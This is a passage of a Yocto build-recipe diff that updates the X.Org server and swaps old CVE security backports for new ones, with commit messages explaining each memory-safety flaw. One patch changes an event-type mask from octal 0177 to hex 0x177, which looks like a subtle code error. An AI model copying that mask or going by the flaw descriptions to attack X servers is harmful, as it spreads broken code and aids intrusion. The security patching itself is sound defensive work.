12S = "${WORKDIR}/${XORG_PN}-${PV}" 13S = "${WORKDIR}/${XORG_PN}-${PV}"
13 14
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc b/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
index b4f0760176..ce57982a7d 100644
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
@@ -16,9 +16,17 @@ PE = "2"
16INC_PR = "r8" 16INC_PR = "r8"
17 17
18XORG_PN = "xorg-server" 18XORG_PN = "xorg-server"
19SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.bz2" 19SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.gz"
20 20
21CVE_PRODUCT = "xorg-server" 21CVE_PRODUCT = "xorg-server x_server"
22# This is specific to Debian's xserver-wrapper.c
23CVE_CHECK_WHITELIST += "CVE-2011-4613"
24# As per upstream, exploiting this flaw is non-trivial and it requires exact
25# timing on the behalf of the attacker. Many graphical applications exit if their
26# connection to the X server is lost, so a typical desktop session is either
27# impossible or difficult to exploit. There is currently no upstream patch
28# available for this flaw.
29CVE_CHECK_WHITELIST += "CVE-2020-25697"
22 30
23S = "${WORKDIR}/${XORG_PN}-${PV}" 31S = "${WORKDIR}/${XORG_PN}-${PV}"
24 32
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14345.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14345.patch
deleted file mode 100644
index fb3a37c474..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14345.patch
+++ /dev/null
@@ -1,182 +0,0 @@
1From f7cd1276bbd4fe3a9700096dec33b52b8440788d Mon Sep 17 00:00:00 2001
2From: Matthieu Herrb <matthieu@herrb.eu>
3Date: Tue, 18 Aug 2020 14:46:32 +0200
4Subject: [PATCH] Correct bounds checking in XkbSetNames()
5
6CVE-2020-14345 / ZDI 11428
7
8This vulnerability was discovered by:
9Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
10
11Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
12
13Upstream-Status: Backport
14CVE: CVE-2020-14345
15Affects < 1.20.9
16
17Signed-off-by: Armin Kuster <akuster@mvista.com>
18
19---
20 xkb/xkb.c | 48 ++++++++++++++++++++++++++++++++++++++++++++++++
21 1 file changed, 48 insertions(+)
22
23Index: xorg-server-1.20.8/xkb/xkb.c
24===================================================================
25--- xorg-server-1.20.8.orig/xkb/xkb.c
26+++ xorg-server-1.20.8/xkb/xkb.c
27@@ -152,6 +152,19 @@ static RESTYPE RT_XKBCLIENT;
28 #define CHK_REQ_KEY_RANGE(err,first,num,r) \
29 CHK_REQ_KEY_RANGE2(err,first,num,r,client->errorValue,BadValue)
30
31+static Bool
32+_XkbCheckRequestBounds(ClientPtr client, void *stuff, void *from, void *to) {
33+ char *cstuff = (char *)stuff;
34+ char *cfrom = (char *)from;
35+ char *cto = (char *)to;
36+
37+ return cfrom < cto &&
38+ cfrom >= cstuff &&
39+ cfrom < cstuff + ((size_t)client->req_len << 2) &&
40+ cto >= cstuff &&
41+ cto <= cstuff + ((size_t)client->req_len << 2);
42+}
43+
44 /***====================================================================***/
45
46 int
47@@ -4045,6 +4058,8 @@ _XkbSetNamesCheck(ClientPtr client, Devi
48 client->errorValue = _XkbErrCode2(0x04, stuff->firstType);
49 return BadAccess;
50 }
51+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + stuff->nTypes))
52+ return BadLength;
53 old = tmp;
54 tmp = _XkbCheckAtoms(tmp, stuff->nTypes, client->swapped, &bad);
55 if (!tmp) {
56@@ -4074,6 +4089,8 @@ _XkbSetNamesCheck(ClientPtr client, Devi
57 }
58 width = (CARD8 *) tmp;
59 tmp = (CARD32 *) (((char *) tmp) + XkbPaddedSize(stuff->nKTLevels));
60+ if (!_XkbCheckRequestBounds(client, stuff, width, tmp))
61+ return BadLength;
62 type = &xkb->map->types[stuff->firstKTLevel];
63 for (i = 0; i < stuff->nKTLevels; i++, type++) {
64 if (width[i] == 0)
65@@ -4083,6 +4100,8 @@ _XkbSetNamesCheck(ClientPtr client, Devi
66 type->num_levels, width[i]);
67 return BadMatch;
68 }
69+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + width[i]))
70+ return BadLength;
71 tmp = _XkbCheckAtoms(tmp, width[i], client->swapped, &bad);
72 if (!tmp) {
73 client->errorValue = bad;
74@@ -4095,6 +4114,9 @@ _XkbSetNamesCheck(ClientPtr client, Devi
75 client->errorValue = 0x08;
76 return BadMatch;
77 }
78+ if (!_XkbCheckRequestBounds(client, stuff, tmp,
79+ tmp + Ones(stuff->indicators)))
80+ return BadLength;
81 tmp = _XkbCheckMaskedAtoms(tmp, XkbNumIndicators, stuff->indicators,
82 client->swapped, &bad);
83 if (!tmp) {
84@@ -4107,6 +4129,9 @@ _XkbSetNamesCheck(ClientPtr client, Devi
85 client->errorValue = 0x09;
86 return BadMatch;
87 }
88+ if (!_XkbCheckRequestBounds(client, stuff, tmp,
89+ tmp + Ones(stuff->virtualMods)))
90+ return BadLength;
91 tmp = _XkbCheckMaskedAtoms(tmp, XkbNumVirtualMods,
92 (CARD32) stuff->virtualMods,
93 client->swapped, &bad);
94@@ -4120,6 +4145,9 @@ _XkbSetNamesCheck(ClientPtr client, Devi
95 client->errorValue = 0x0a;
96 return BadMatch;
97 }
98+ if (!_XkbCheckRequestBounds(client, stuff, tmp,
99+ tmp + Ones(stuff->groupNames)))
100+ return BadLength;
101 tmp = _XkbCheckMaskedAtoms(tmp, XkbNumKbdGroups,
102 (CARD32) stuff->groupNames,
103 client->swapped, &bad);
104@@ -4141,9 +4169,14 @@ _XkbSetNamesCheck(ClientPtr client, Devi
105 stuff->nKeys);
106 return BadValue;
107 }
108+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + stuff->nKeys))
109+ return BadLength;
110 tmp += stuff->nKeys;
111 }
112 if ((stuff->which & XkbKeyAliasesMask) && (stuff->nKeyAliases > 0)) {
113+ if (!_XkbCheckRequestBounds(client, stuff, tmp,
114+ tmp + (stuff->nKeyAliases * 2)))
115+ return BadLength;
116 tmp += stuff->nKeyAliases * 2;
117 }
118 if (stuff->which & XkbRGNamesMask) {
119@@ -4151,6 +4184,9 @@ _XkbSetNamesCheck(ClientPtr client, Devi
120 client->errorValue = _XkbErrCode2(0x0d, stuff->nRadioGroups);
121 return BadValue;
122 }
123+ if (!_XkbCheckRequestBounds(client, stuff, tmp,
124+ tmp + stuff->nRadioGroups))
125+ return BadLength;
126 tmp = _XkbCheckAtoms(tmp, stuff->nRadioGroups, client->swapped, &bad);
127 if (!tmp) {
128 client->errorValue = bad;
129@@ -4344,6 +4380,8 @@ ProcXkbSetNames(ClientPtr client)
130 /* check device-independent stuff */
131 tmp = (CARD32 *) &stuff[1];
132
133+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + 1))
134+ return BadLength;
135 if (stuff->which & XkbKeycodesNameMask) {
136 tmp = _XkbCheckAtoms(tmp, 1, client->swapped, &bad);
137 if (!tmp) {
138@@ -4351,6 +4389,8 @@ ProcXkbSetNames(ClientPtr client)
139 return BadAtom;
140 }
141 }
142+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + 1))
143+ return BadLength;
144 if (stuff->which & XkbGeometryNameMask) {
145 tmp = _XkbCheckAtoms(tmp, 1, client->swapped, &bad);
146 if (!tmp) {
147@@ -4358,6 +4398,8 @@ ProcXkbSetNames(ClientPtr client)
148 return BadAtom;
149 }
150 }
151+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + 1))
152+ return BadLength;
153 if (stuff->which & XkbSymbolsNameMask) {
154 tmp = _XkbCheckAtoms(tmp, 1, client->swapped, &bad);
155 if (!tmp) {
156@@ -4365,6 +4407,8 @@ ProcXkbSetNames(ClientPtr client)
157 return BadAtom;
158 }
159 }
160+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + 1))
161+ return BadLength;
162 if (stuff->which & XkbPhysSymbolsNameMask) {
163 tmp = _XkbCheckAtoms(tmp, 1, client->swapped, &bad);
164 if (!tmp) {
165@@ -4372,6 +4416,8 @@ ProcXkbSetNames(ClientPtr client)
166 return BadAtom;
167 }
168 }
169+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + 1))
170+ return BadLength;
171 if (stuff->which & XkbTypesNameMask) {
172 tmp = _XkbCheckAtoms(tmp, 1, client->swapped, &bad);
173 if (!tmp) {
174@@ -4379,6 +4425,8 @@ ProcXkbSetNames(ClientPtr client)
175 return BadAtom;
176 }
177 }
178+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + 1))
179+ return BadLength;
180 if (stuff->which & XkbCompatNameMask) {
181 tmp = _XkbCheckAtoms(tmp, 1, client->swapped, &bad);
182 if (!tmp) {
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch
deleted file mode 100644
index 4994a21d33..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch
+++ /dev/null
@@ -1,36 +0,0 @@
1From c940cc8b6c0a2983c1ec974f1b3f019795dd4cff Mon Sep 17 00:00:00 2001
2From: Matthieu Herrb <matthieu@herrb.eu>
3Date: Tue, 18 Aug 2020 14:49:04 +0200
4Subject: [PATCH] Fix XIChangeHierarchy() integer underflow
5
6CVE-2020-14346 / ZDI-CAN-11429
7
8This vulnerability was discovered by:
9Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
10
11Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
12
13Upstream-Status: Backport
14[https://gitlab.freedesktop.org/xorg/xserver/-/commit/c940cc8b6c0a2983c1ec974f1b3f019795dd4cff]
15CVE: CVE-2020-14346
16Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
17---
18 Xi/xichangehierarchy.c | 2 +-
19 1 file changed, 1 insertion(+), 1 deletion(-)
20
21diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
22index cbdd91258..504defe56 100644
23--- a/Xi/xichangehierarchy.c
24+++ b/Xi/xichangehierarchy.c
25@@ -423,7 +423,7 @@ ProcXIChangeHierarchy(ClientPtr client)
26 if (!stuff->num_changes)
27 return rc;
28
29- len = ((size_t)stuff->length << 2) - sizeof(xXIChangeHierarchyReq);
30+ len = ((size_t)client->req_len << 2) - sizeof(xXIChangeHierarchyReq);
31
32 any = (xXIAnyHierarchyChangeInfo *) &stuff[1];
33 while (stuff->num_changes--) {
34--
352.17.1
36
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch
deleted file mode 100644
index cf3f5f9417..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch
+++ /dev/null
@@ -1,38 +0,0 @@
1From aac28e162e5108510065ad4c323affd6deffd816 Mon Sep 17 00:00:00 2001
2From: Matthieu Herrb <matthieu@herrb.eu>
3Date: Sat, 25 Jul 2020 19:33:50 +0200
4Subject: [PATCH] fix for ZDI-11426
5
6Avoid leaking un-initalized memory to clients by zeroing the
7whole pixmap on initial allocation.
8
9This vulnerability was discovered by:
10Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
11
12Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
13Reviewed-by: Alan Coopersmith <alan.coopersmith@oracle.com>
14
15
16Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/aac28e162e5108510065ad4c323affd6deffd816]
17CVE: CVE-2020-14347
18Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
19---
20 dix/pixmap.c | 2 +-
21 1 file changed, 1 insertion(+), 1 deletion(-)
22
23diff --git a/dix/pixmap.c b/dix/pixmap.c
24index 1186d7dbbf..5a0146bbb6 100644
25--- a/dix/pixmap.c
26+++ b/dix/pixmap.c
27@@ -116,7 +116,7 @@ AllocatePixmap(ScreenPtr pScreen, int pixDataSize)
28 if (pScreen->totalPixmapSize > ((size_t) - 1) - pixDataSize)
29 return NullPixmap;
30
31- pPixmap = malloc(pScreen->totalPixmapSize + pixDataSize);
32+ pPixmap = calloc(1, pScreen->totalPixmapSize + pixDataSize);
33 if (!pPixmap)
34 return NullPixmap;
35
36--
37GitLab
38
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch
deleted file mode 100644
index 710cc3873c..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch
+++ /dev/null
@@ -1,36 +0,0 @@
1From 144849ea27230962227e62a943b399e2ab304787 Mon Sep 17 00:00:00 2001
2From: Matthieu Herrb <matthieu@herrb.eu>
3Date: Tue, 18 Aug 2020 14:52:29 +0200
4Subject: [PATCH] Fix XkbSelectEvents() integer underflow
5
6CVE-2020-14361 ZDI-CAN 11573
7
8This vulnerability was discovered by:
9Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
10
11Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
12
13Upstream-Status: Backport
14[https://gitlab.freedesktop.org/xorg/xserver/-/commit/144849ea27230962227e62a943b399e2ab304787]
15CVE: CVE-2020-14361
16Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
17---
18 xkb/xkbSwap.c | 2 +-
19 1 file changed, 1 insertion(+), 1 deletion(-)
20
21diff --git a/xkb/xkbSwap.c b/xkb/xkbSwap.c
22index 1c1ed5ff4..50cabb90e 100644
23--- a/xkb/xkbSwap.c
24+++ b/xkb/xkbSwap.c
25@@ -76,7 +76,7 @@ SProcXkbSelectEvents(ClientPtr client)
26 register unsigned bit, ndx, maskLeft, dataLeft, size;
27
28 from.c8 = (CARD8 *) &stuff[1];
29- dataLeft = (stuff->length * 4) - SIZEOF(xkbSelectEventsReq);
30+ dataLeft = (client->req_len * 4) - SIZEOF(xkbSelectEventsReq);
31 maskLeft = (stuff->affectWhich & (~XkbMapNotifyMask));
32 for (ndx = 0, bit = 1; (maskLeft != 0); ndx++, bit <<= 1) {
33 if (((bit & maskLeft) == 0) || (ndx == XkbMapNotify))
34--
352.17.1
36
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch
deleted file mode 100644
index 2103e9c198..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch
+++ /dev/null
@@ -1,70 +0,0 @@
1From 2902b78535ecc6821cc027351818b28a5c7fdbdc Mon Sep 17 00:00:00 2001
2From: Matthieu Herrb <matthieu@herrb.eu>
3Date: Tue, 18 Aug 2020 14:55:01 +0200
4Subject: [PATCH] Fix XRecordRegisterClients() Integer underflow
5
6CVE-2020-14362 ZDI-CAN-11574
7
8This vulnerability was discovered by:
9Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
10
11Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
12
13Upstream-Status: Backport
14[https://gitlab.freedesktop.org/xorg/xserver/-/commit/2902b78535ecc6821cc027351818b28a5c7fdbdc]
15CVE: CVE-2020-14362
16Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
17---
18 record/record.c | 10 +++++-----
19 1 file changed, 5 insertions(+), 5 deletions(-)
20
21diff --git a/record/record.c b/record/record.c
22index f2d38c877..be154525d 100644
23--- a/record/record.c
24+++ b/record/record.c
25@@ -2500,7 +2500,7 @@ SProcRecordQueryVersion(ClientPtr client)
26 } /* SProcRecordQueryVersion */
27
28 static int _X_COLD
29-SwapCreateRegister(xRecordRegisterClientsReq * stuff)
30+SwapCreateRegister(ClientPtr client, xRecordRegisterClientsReq * stuff)
31 {
32 int i;
33 XID *pClientID;
34@@ -2510,13 +2510,13 @@ SwapCreateRegister(xRecordRegisterClientsReq * stuff)
35 swapl(&stuff->nRanges);
36 pClientID = (XID *) &stuff[1];
37 if (stuff->nClients >
38- stuff->length - bytes_to_int32(sz_xRecordRegisterClientsReq))
39+ client->req_len - bytes_to_int32(sz_xRecordRegisterClientsReq))
40 return BadLength;
41 for (i = 0; i < stuff->nClients; i++, pClientID++) {
42 swapl(pClientID);
43 }
44 if (stuff->nRanges >
45- stuff->length - bytes_to_int32(sz_xRecordRegisterClientsReq)
46+ client->req_len - bytes_to_int32(sz_xRecordRegisterClientsReq)
47 - stuff->nClients)
48 return BadLength;
49 RecordSwapRanges((xRecordRange *) pClientID, stuff->nRanges);
50@@ -2531,7 +2531,7 @@ SProcRecordCreateContext(ClientPtr client)
51
52 swaps(&stuff->length);
53 REQUEST_AT_LEAST_SIZE(xRecordCreateContextReq);
54- if ((status = SwapCreateRegister((void *) stuff)) != Success)
55+ if ((status = SwapCreateRegister(client, (void *) stuff)) != Success)
56 return status;
57 return ProcRecordCreateContext(client);
58 } /* SProcRecordCreateContext */
59@@ -2544,7 +2544,7 @@ SProcRecordRegisterClients(ClientPtr client)
60
61 swaps(&stuff->length);
62 REQUEST_AT_LEAST_SIZE(xRecordRegisterClientsReq);
63- if ((status = SwapCreateRegister((void *) stuff)) != Success)
64+ if ((status = SwapCreateRegister(client, (void *) stuff)) != Success)
65 return status;
66 return ProcRecordRegisterClients(client);
67 } /* SProcRecordRegisterClients */
68--
692.17.1
70
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch
new file mode 100644
index 0000000000..efec7b6b4e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch
@@ -0,0 +1,40 @@
1From d2dcbdc67c96c84dff301505072b0b7b022f1a14 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Sun, 4 Dec 2022 17:40:21 +0000
4Subject: [PATCH 1/3] xkb: proof GetCountedString against request length
5 attacks
6
7GetCountedString did a check for the whole string to be within the
8request buffer but not for the initial 2 bytes that contain the length
9field. A swapped client could send a malformed request to trigger a
10swaps() on those bytes, writing into random memory.
11
12Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
13
14Ustream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=11beef0b7f1ed290348e45618e5fa0d2bffcb72e]
15CVE: CVE-2022-3550
16Signed-off-by:Minjae Kim <flowergom@gmail.com>
17
18---
19 xkb/xkb.c | 5 +++++
20 1 file changed, 5 insertions(+)
21
22diff --git a/xkb/xkb.c b/xkb/xkb.c
23index 68c59df..bf8aaa3 100644
24--- a/xkb/xkb.c
25+++ b/xkb/xkb.c
26@@ -5138,6 +5138,11 @@ _GetCountedString(char **wire_inout, ClientPtr client, char **str)
27 CARD16 len;
28
29 wire = *wire_inout;
30+
31+ if (client->req_len <
32+ bytes_to_int32(wire + 2 - (char *) client->requestBuffer))
33+ return BadValue;
34+
35 len = *(CARD16 *) wire;
36 if (client->swapped) {
37 swaps(&len);
38--
392.17.1
40
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch
new file mode 100644
index 0000000000..a3b977aac9
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch
@@ -0,0 +1,64 @@
1From d3787290f56165f5656ddd2123dbf676a32d0a68 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Sun, 4 Dec 2022 17:44:00 +0000
4Subject: [PATCH 2/3] xkb: fix some possible memleaks in XkbGetKbdByName
5
6GetComponentByName returns an allocated string, so let's free that if we
7fail somewhere.
8
9Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
10
11Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=18f91b950e22c2a342a4fbc55e9ddf7534a707d2]
12CVE: CVE-2022-3551
13Signed-off-by:Minjae Kim <flowergom@gmail.com>
14
15---
16 xkb/xkb.c | 26 +++++++++++++++++++-------
17 1 file changed, 19 insertions(+), 7 deletions(-)
18
19diff --git a/xkb/xkb.c b/xkb/xkb.c
20index bf8aaa3..f79d306 100644
21--- a/xkb/xkb.c
22+++ b/xkb/xkb.c
23@@ -5908,19 +5908,31 @@ ProcXkbGetKbdByName(ClientPtr client)
24 xkb = dev->key->xkbInfo->desc;
25 status = Success;
26 str = (unsigned char *) &stuff[1];
27- if (GetComponentSpec(&str, TRUE, &status)) /* keymap, unsupported */
28- return BadMatch;
29+ {
30+ char *keymap = GetComponentSpec(&str, TRUE, &status); /* keymap, unsupported */
31+ if (keymap) {
32+ free(keymap);
33+ return BadMatch;
34+ }
35+ }
36 names.keycodes = GetComponentSpec(&str, TRUE, &status);
37 names.types = GetComponentSpec(&str, TRUE, &status);
38 names.compat = GetComponentSpec(&str, TRUE, &status);
39 names.symbols = GetComponentSpec(&str, TRUE, &status);
40 names.geometry = GetComponentSpec(&str, TRUE, &status);
41- if (status != Success)
42- return status;
43- len = str - ((unsigned char *) stuff);
44- if ((XkbPaddedSize(len) / 4) != stuff->length)
45- return BadLength;
46+ if (status == Success) {
47+ len = str - ((unsigned char *) stuff);
48+ if ((XkbPaddedSize(len) / 4) != stuff->length)
49+ status = BadLength;
50+ }
51
52+ if (status != Success) {
53+ free(names.keycodes);
54+ free(names.types);
55+ free(names.compat);
56+ free(names.symbols);
57+ free(names.geometry);
58+ }
59 CHK_MASK_LEGAL(0x01, stuff->want, XkbGBN_AllComponentsMask);
60 CHK_MASK_LEGAL(0x02, stuff->need, XkbGBN_AllComponentsMask);
61
62--
632.17.1
64
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch
new file mode 100644
index 0000000000..94cea77edc
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch
@@ -0,0 +1,49 @@
1From 57ad2c03730d56f8432b6d66b29c0e5a9f9b1ec2 Mon Sep 17 00:00:00 2001
2From: Jeremy Huddleston Sequoia <jeremyhu@apple.com>
3Date: Sun, 4 Dec 2022 17:46:18 +0000
4Subject: [PATCH 3/3] xquartz: Fix a possible crash when editing the
5 Application menu due to mutaing immutable arrays
6
7Crashing on exception: -[__NSCFArray replaceObjectAtIndex:withObject:]: mutating method sent to immutable object
8
9Application Specific Backtrace 0:
100 CoreFoundation 0x00007ff80d2c5e9b __exceptionPreprocess + 242
111 libobjc.A.dylib 0x00007ff80d027e48 objc_exception_throw + 48
122 CoreFoundation 0x00007ff80d38167b _CFThrowFormattedException + 194
133 CoreFoundation 0x00007ff80d382a25 -[__NSCFArray removeObjectAtIndex:].cold.1 + 0
144 CoreFoundation 0x00007ff80d2e6c0b -[__NSCFArray replaceObjectAtIndex:withObject:] + 119
155 X11.bin 0x00000001003180f9 -[X11Controller tableView:setObjectValue:forTableColumn:row:] + 169
16
17Fixes: https://github.com/XQuartz/XQuartz/issues/267
18Signed-off-by: Jeremy Huddleston Sequoia <jeremyhu@apple.com>
19
20Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=dfd057996b26420309c324ec844a5ba6dd07eda3]
21CVE: CVE-2022-3553
22Signed-off-by:Minjae Kim <flowergom@gmail.com>
23
24---
25 hw/xquartz/X11Controller.m | 8 ++++++--
26 1 file changed, 6 insertions(+), 2 deletions(-)
27
28diff --git a/hw/xquartz/X11Controller.m b/hw/xquartz/X11Controller.m
29index 3efda50..9870ff2 100644
30--- a/hw/xquartz/X11Controller.m
31+++ b/hw/xquartz/X11Controller.m
32@@ -467,8 +467,12 @@ extern char *bundle_id_prefix;
33 self.table_apps = table_apps;
34
35 NSArray * const apps = self.apps;
36- if (apps != nil)
37- [table_apps addObjectsFromArray:apps];
38+
39+ if (apps != nil) {
40+ for (NSArray <NSString *> * row in apps) {
41+ [table_apps addObject:row.mutableCopy];
42+ }
43+ }
44
45 columns = [apps_table tableColumns];
46 [[columns objectAtIndex:0] setIdentifier:@"0"];
47--
482.17.1
49
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch
new file mode 100644
index 0000000000..3f6b68fea8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch
@@ -0,0 +1,39 @@
1From ccdd431cd8f1cabae9d744f0514b6533c438908c Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Mon, 5 Dec 2022 15:55:54 +1000
4Subject: [PATCH] xkb: reset the radio_groups pointer to NULL after freeing it
5
6Unlike other elements of the keymap, this pointer was freed but not
7reset. On a subsequent XkbGetKbdByName request, the server may access
8already freed memory.
9
10CVE-2022-4283, ZDI-CAN-19530
11
12This vulnerability was discovered by:
13Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
14
15Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
16Acked-by: Olivier Fourdan <ofourdan@redhat.com>
17
18Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/ccdd431cd8f1cabae9d744f0514b6533c438908c]
19CVE: CVE-2022-4283
20Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
21---
22 xkb/xkbUtils.c | 1 +
23 1 file changed, 1 insertion(+)
24
25diff --git a/xkb/xkbUtils.c b/xkb/xkbUtils.c
26index 8975ade..9bc51fc 100644
27--- a/xkb/xkbUtils.c
28+++ b/xkb/xkbUtils.c
29@@ -1327,6 +1327,7 @@ _XkbCopyNames(XkbDescPtr src, XkbDescPtr dst)
30 }
31 else {
32 free(dst->names->radio_groups);
33+ dst->names->radio_groups = NULL;
34 }
35 dst->names->num_rg = src->names->num_rg;
36
37--
382.25.1
39
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch
new file mode 100644
index 0000000000..a6c97485cd
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch
@@ -0,0 +1,55 @@
1From b320ca0ffe4c0c872eeb3a93d9bde21f765c7c63 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Tue, 29 Nov 2022 12:55:45 +1000
4Subject: [PATCH] Xtest: disallow GenericEvents in XTestSwapFakeInput
5
6XTestSwapFakeInput assumes all events in this request are
7sizeof(xEvent) and iterates through these in 32-byte increments.
8However, a GenericEvent may be of arbitrary length longer than 32 bytes,
9so any GenericEvent in this list would result in subsequent events to be
10misparsed.
11
12Additional, the swapped event is written into a stack-allocated struct
13xEvent (size 32 bytes). For any GenericEvent longer than 32 bytes,
14swapping the event may thus smash the stack like an avocado on toast.
15
16Catch this case early and return BadValue for any GenericEvent.
17Which is what would happen in unswapped setups anyway since XTest
18doesn't support GenericEvent.
19
20CVE-2022-46340, ZDI-CAN 19265
21
22This vulnerability was discovered by:
23Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
24
25Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
26Acked-by: Olivier Fourdan <ofourdan@redhat.com>
27
28Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/b320ca0ffe4c0c872eeb3a93d9bde21f765c7c63]
29CVE: CVE-2022-46340
30Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
31---
32 Xext/xtest.c | 5 +++--
33 1 file changed, 3 insertions(+), 2 deletions(-)
34
35diff --git a/Xext/xtest.c b/Xext/xtest.c
36index 38b8012..bf11789 100644
37--- a/Xext/xtest.c
38+++ b/Xext/xtest.c
39@@ -501,10 +501,11 @@ XTestSwapFakeInput(ClientPtr client, xReq * req)
40
41 nev = ((req->length << 2) - sizeof(xReq)) / sizeof(xEvent);
42 for (ev = (xEvent *) &req[1]; --nev >= 0; ev++) {
43+ int evtype = ev->u.u.type & 0x177;
44 /* Swap event */
45- proc = EventSwapVector[ev->u.u.type & 0177];
46+ proc = EventSwapVector[evtype];
47 /* no swapping proc; invalid event type? */
48- if (!proc || proc == NotImplemented) {
49+ if (!proc || proc == NotImplemented || evtype == GenericEvent) {
50 client->errorValue = ev->u.u.type;
51 return BadValue;
52 }
53--
542.25.1
55
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch
new file mode 100644
index 0000000000..0ef6e5fc9f
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch
@@ -0,0 +1,86 @@
1From 51eb63b0ee1509c6c6b8922b0e4aa037faa6f78b Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Tue, 29 Nov 2022 13:55:32 +1000
4Subject: [PATCH] Xi: disallow passive grabs with a detail > 255
5
6The XKB protocol effectively prevents us from ever using keycodes above
7255. For buttons it's theoretically possible but realistically too niche
8to worry about. For all other passive grabs, the detail must be zero
9anyway.
10
11This fixes an OOB write:
12
13ProcXIPassiveUngrabDevice() calls DeletePassiveGrabFromList with a
